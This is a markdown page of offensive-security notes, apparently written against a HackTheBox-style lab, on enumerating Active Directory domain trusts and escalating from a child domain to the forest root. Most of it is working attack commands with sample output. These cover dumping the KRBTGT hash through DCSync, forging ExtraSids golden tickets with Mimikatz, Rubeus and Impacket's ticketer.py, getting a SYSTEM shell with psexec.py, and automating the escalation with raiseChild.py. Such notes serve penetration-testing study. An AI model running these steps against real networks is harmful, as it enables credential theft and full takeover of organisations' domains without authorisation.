---
layout: app
title: "Active Directory Forest"
tags: ["netdom","powerview", "KRBTGT","ExtraSids","sidHistory", "DCSync"]

---

# Native Powershell Modules

## Enumerating Trust Relationships

```powershell
Import-Module activedirectory
Get-ADTrust -Filter *
```

# With Powerview

```powershell
(powerview)> Get-DomainTrust 
```

## Using Get-DomainTrustMapping

```powershell
(powerview)> Get-DomainTrustMapping
```

## Checking Users in the Child Domain using Get-DomainUser

```powershell
(powerview)> Get-DomainUser -Domain [child domain] | select SamAccountName
```

Another tool we can use to get Domain Trust is netdom. The netdom query sub-command of the netdom command-line tool in Windows can retrieve information about the domain, including a list of workstations, servers, and domain trusts.


## Using netdom to query domain trust

```bash
netdom query /domain:[ domain] trust
```

## Using netdom to query domain controllers
```bash
netdom query /domain:[domain] dc
```

## Using netdom to query workstations and servers
```bash
netdom query /domain:[domain] workstation
```

# Using BloodHound

We can also use BloodHound to visualize these trust relationships by using the **Map Domain Trusts** pre-built query. Here we can easily see that two bidirectional trusts exist.

# Attacking Domain Trusts - Child -> Parent Trusts - from Windows

Using Mimikatz, an attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. When logging in with this account, all of the SIDs associated with the account are added to the user's token.

This token is used to determine what resources the account can access. If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform **DCSync** and create a **[Golden Ticket](https://attack.mitre.org/techniques/T1558/001/)** or a **Kerberos ticket-granting ticket (TGT)**, which will allow for us to authenticate as any account in the domain of our choosing for further persistence.

# ExtraSids Attack - Mimikatz

To perform this attack after compromising a child domain, we need the following:

* The KRBTGT hash for the child domain
* The SID for the child domain
* The name of a target user in the child domain (does not need to exist!)
* The FQDN of the child domain.
* The SID of the Enterprise Admins group of the root domain.
* With this data collected, the attack can be performed with Mimikatz.

# Obtaining the KRBTGT Account's NT Hash using Mimikatz

Perform **DCSYNC** attack to get **NTLM** hash.

```bash
(mimikatz)> lsadump::dcsync /user:[domain]\krbtgt
...

Hash NTLM: 9d765b482771505cbe97411065964d5f
ntlm- 0: 9d765b482771505cbe97411065964d5f
lm  - 0: 69df324191d4a80f0ed100c10f20561e
```



### Get SID Domain

```powershell
(powerview)> Get-DomainSID
```
### Obtaining Enterprise Admins Group's SID using Get-DomainGroup

```powershell
(PS)> Get-ADGroup -Identity "Enterprise Admins" 
(powerview)> Get-DomainGroup -Domain [domain] -Identity "Enterprise Admins" | select distinguishedname,objectsid
```
At this point, we have gathered the following data points:

* The KRBTGT hash for the child domain: XXXXXXXXXXXXXXX
* The SID for the child domain: S-1-5-XXXXXXXXXXXX
* The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: **hacker**
* The FQDN of the child domain: xxxx.yyyy.ccc
* The SID of the Enterprise Admins group of the root domain: S-1-5-21-AAAAAAAAAAAAAAAAAAAAAAAAAA


### Ready! to Attack
Creating a Golden Ticket with Mimikatz

```powershell
(mimikatz) # kerberos::golden /user:hacker /domain:[domain] /sid:S-1-5-21-XXXXXXXXXXXXX /krbtgt:[KRBTGT hash] /sids:S-1-5-21-AAAAAAAAAAAAAAAAAAAAAAAA /ptt
(PS) > klist 
```
From here, it is possible to access any resources within the parent domain, and we could compromise the parent domain in several ways.

## ExtraSids Attack - Rubeus

```powershell
.\Rubeus.exe golden /rc4:[KRBTGT hash] /domain:[domain] /sid:S-1-5-21-XXXXXXXXXXXXXXXXXXX  /sids:S-1-5-21-AAAAAAAAAAAAAAAAAAA /user:hacker /ptt
(PS)> klist
```

# Attacking Domain Trusts - Child -> Parent Trusts From Linux

```bash
secretsdump.py [child domain]/[username]@[child domain address] -just-dc-user [child domain]/[user]
```

**EXAMPLE**
```bash
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
```

**OUTPUT**
We need use this krbtgt:502:aad3b435b51404eeaad3b435b51404ee:**9d765b482771505cbe97411065964d5f**:::

```bash
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e
krbtgt:des-cbc-md5:fee04c3d026d7538
[*] Cleaning up
```

Next, we can use [lookupsid.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py) from the Impacket toolkit to perform SID brute forcing to find the SID of the child domain. In this command, whatever we specify for the IP address (the IP of the domain controller in the child domain) will become the target domain for a SID lookup. The tool will give us back the SID for the domain and the RIDs for each user and group that could be used to create their SID in the format DOMAIN_SID-RID. For example, from the output below, we can see that the SID of the lab_adm user would be S-1-5-21-2806153819-209893948-922872689-1001.

## Looking for the Domain SID

```bash
lookupsid.py [child domain]/[user]@[address] | grep "Domain SID"
```
**Example**
```bash
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240
```

## Grabbing the Domain SID & Attaching to Enterprise Admin's RID
```bash
lookupsid.py [principal domain]/[username]@[address] | grep -B12 "Enterprise Admins"
```
**Example**
```bash
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"
```

Next, we can use [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) from the Impacket toolkit to construct a Golden Ticket. This ticket will be valid to access resources in the child domain (specified by -domain-sid) and the parent domain (specified by -extra-sid).

## Constructing a Golden Ticket using ticketer.py

```bash
ticketer.py -nthash [ntlm hash] -domain [child domain] -domain-sid [SID]-519 -extra-sid [enterprise admin SID] hacker
```
Append sufix number to extra-sid, like says on [https://adsecurity.org/?p=1001](https://adsecurity.org/?p=1001)

The ticket will be saved down to our system as a [credential cache (ccache) file](https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html), which is a file used to hold Kerberos credentials. Setting the **KRB5CCNAME** environment variable tells the system to use this file for Kerberos authentication attempts.

## Setting the KRB5CCNAME Environment Variable

```bash
export KRB5CCNAME=hacker.ccache 
```

We can check if we can successfully authenticate to the parent domain's Domain Controller using [Impacket's version of Psexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py). If successful, we will be dropped into a SYSTEM shell on the target Domain Controller.

## Getting a SYSTEM shell using Impacket's psexec.py

```bash
psexec.py [child domain]/hacker@[FQDN] -k -no-pass -target-ip [domain IP address]
```

Impacket also has the tool [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py), which will automate escalating from child to parent domain. We need to specify the target domain controller and credentials for an administrative user in the child domain; the script will do the rest. If we walk through the output, we see that it starts by listing out the child and parent domain's fully qualified domain names (FQDN). It then:

# Performing the Attack with raiseChild.py

```bash
raiseChild.py -target-exec [address] [child domain]/[adminuser]
```